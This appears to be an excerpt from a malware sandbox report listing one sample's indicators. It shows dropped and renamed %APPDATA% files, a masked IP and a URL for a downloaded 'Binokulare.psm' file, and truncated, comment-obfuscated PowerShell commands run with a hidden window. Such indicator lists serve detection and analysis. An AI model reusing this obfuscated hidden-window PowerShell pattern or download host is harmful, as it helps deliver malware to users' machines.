Technical Information
- %APPDATA%\bitd420.tmp
- %APPDATA%\bitd420.tmp
- from %APPDATA%\bitd420.tmp to %APPDATA%\landgate.pli
- '14#.#8.103.250':80
- http://14#.#8.103.250/Binokulare.psm
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Tewart Parasitotropy Demimondnes Amorin #>;<#Calvadosernes Tredivtedels Acroamata Misbranding Milklike Bluisness Datteren #>;New-Item -Path 'Layrock:\Jozefs' -Name 'Cecostomy' -ItemType 'fil...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Tewart Parasitotropy Demimondnes Amorin #>;<#Calvadosernes Tredivtedels Acroamata Misbranding Milklike Bluisness Datteren #>;New-Item -Path 'Layrock:\Jozefs' -Name 'Cecostomy' -ItemType 'fil...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Tewart Parasitotropy Demimondnes Amorin #>;<#Calvadosernes Tredivtedels Acroamata Misbranding Milklike Bluisness Datteren #>;New-Item -Path 'Layrock:\Jozefs' -Name 'Cecostomy' -ItemType 'fil...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"